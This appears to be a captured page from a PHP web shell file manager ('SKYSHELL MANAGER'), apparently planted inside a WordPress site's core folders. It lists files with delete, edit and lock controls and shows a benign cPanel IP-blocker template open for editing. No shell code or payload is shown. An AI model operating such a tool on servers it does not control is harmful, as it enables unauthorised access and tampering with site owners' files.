📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: delconfirm.html.tt
[% SET CPANEL.CPVAR.dprefix = "../" %] [% Api1.pre_exec("UI", "confirm"); SET confirm = Api1.exec("UI", "confirm", ["UI::confirm::version", "1.0"]); Api1.post_exec("UI", "confirm") %] [% WRAPPER '_assets/master.html.tt' app_key = 'ip_blocker' -%] <div class="body-content"> <h2>[% locale.maketext("Remove IP") %]</h2> <p> [% locale.maketext("Are you certain that you wish to delete the IP address “[output,inline,_1,class,status]”?", FORM.ip) %] </p> <a class="btn btn-primary" href="del.html?ip=[% FORM.ip.uri() %]">[% locale.maketext("Remove IP") %]</a> <a class="btn btn-link" href="index.html">[% locale.maketext("Cancel") %]</a> [% INCLUDE _assets/return_link.html.tt return_location="index.html" return_link_text=locale.maketext("Go Back") %] </div> [% END #wrapper %]
Save